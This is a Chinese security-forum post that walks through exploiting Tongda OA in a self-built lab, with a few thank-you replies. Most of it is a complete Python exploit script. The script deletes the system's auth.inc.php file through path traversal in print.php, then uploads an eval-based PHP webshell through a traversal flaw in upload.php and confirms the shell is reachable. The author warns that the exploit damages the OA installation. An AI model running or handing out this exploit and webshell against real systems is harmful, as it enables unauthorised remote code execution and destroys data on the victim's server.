用户
搜索
  • TA的每日心情
    擦汗
    2020-9-9 09:43
  • 签到天数: 17 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋-脚本小子

    Rank: 2

    4

    主题

    14

    帖子

    357

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2017-11-20
    发表于 2020-8-19 12:56:18 32832
    本帖最后由 i2stay 于 2020-8-19 13:23 编辑

    自行下载版本搭建环境
    1.png
    直接上网上公开的EXP打
    生成一个密码为tongda的文件名为_tongda。php的webshell

    import requests

    target="http://192.168.132.138"
    payload="<?php eval($_POST['tongda']);?>"
    print("Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
    input("Press enter to continue")
    print("Deleting auth.inc.php....")

    url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
    requests.get(url=url)
    print("Checking if file deleted...")
    url=target+"/inc/auth.inc.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[-]Failed to deleted auth.inc.php")
        exit(-1)
    print("[+]Successfully deleted auth.inc.php!")
    print("Uploading payload...")
    url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
    files = {'FILE1': ('tongda.php', payload)}
    requests.post(url=url,files=files)
    url=target+"/tongda.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[+]Filed Uploaded Successfully")
        print("[+]URL:",url)
    else:
        print("[-]Failed to upload file")

    2.png
    我们查看已经生成了一个_tongda.php的webshell
    3.png
    我们连接一下webshell
    4.png
    再次访问时发现index页面不正常
    微信截图_20200819131258.png
    分析exp可知 第一步删除auth.inc.php然后通过print.php来确认是否删除,删除后写入payload
    所以该漏洞利用时的有风险的 建议利用前做备份




    本帖被以下淘专辑推荐:

    发表于 2020-8-19 13:03:45
    补发一下OA源码 链接:https://pan.baidu.com/s/1vrKl5Dd8oycLNmPsdPH9aQ
    提取码:uf0o
    使用道具 举报 回复
    发表于 2020-8-19 17:23:52
    感谢分享
    使用道具 举报 回复
    发表于 2020-8-20 11:22:21
    学习啦
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册